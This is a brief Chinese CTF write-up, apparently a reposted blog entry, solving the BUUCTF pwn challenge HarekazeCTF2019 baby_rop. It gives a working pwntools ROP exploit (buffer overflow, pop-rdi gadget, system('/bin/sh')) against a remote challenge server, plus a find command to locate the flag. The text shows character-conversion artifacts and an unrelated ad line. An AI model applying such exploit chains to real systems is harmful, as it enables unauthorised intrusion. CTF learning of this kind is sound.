因為是64位參數(shù)是儲存在寄存器中,binsh字符串應(yīng)該放在 rdi 寄存器中

from pwn import* p = remote("node3.buuoj.cn",28711) rdi=0x400683 sys=0x4005e3 bin=0x601048 payload='a'*(0x10+8)+p64(rdi)+p64(bin)+p64(sys) p.sendline(payload)

flag不在根目錄下，需要我們找一下，利用find -name flag找一下

find -name "flag"

與50位技術(shù)專家面對面20年技術(shù)見證，附贈技術(shù)全景圖

總結(jié)

以上是生活随笔為你收集整理的BUUCTF(pwn)[HarekazeCTF2019]baby_rop的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。